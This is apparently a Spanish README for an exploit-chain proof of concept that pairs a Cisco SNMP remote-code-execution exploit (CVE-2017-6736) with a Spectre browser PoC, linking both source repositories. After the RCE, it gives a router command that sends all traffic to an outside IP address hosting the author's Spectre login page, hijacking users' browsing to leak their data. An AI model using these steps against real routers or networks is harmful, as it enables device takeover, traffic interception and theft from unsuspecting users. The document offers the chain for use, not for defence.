
Una cadena de exploit POC que utiliza el reciente exploit de Cisco SMP (CVE-2017-6736) para encadenar con Spectre (CVE-2017-5753 y CVE-2017-5715)
Una PoC de explotación encadenada que utiliza el reciente exploit SMP de Cisco (CVE-2017-6736) para encadenar con Spectre (CVE-2017-5753 y CVE-2017-5715)
Submódulo del exploit RCE de Cisco por artkond: https://github.com/artkond/cisco-snmp-rce
POC de JS Spectre para Chrome por ascendr: https://github.com/ascendr/spectre-chrome
Probado en un router Cisco 1841+2600.
Después de ejecutar el exploit RCE. Como configuración, ejecuta:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Esto forzará todo el tráfico a través de la página de inicio de sesión de Spectre que creé. En una fecha posterior añadiré una versión mejor que aborde la navegación real a sitios web.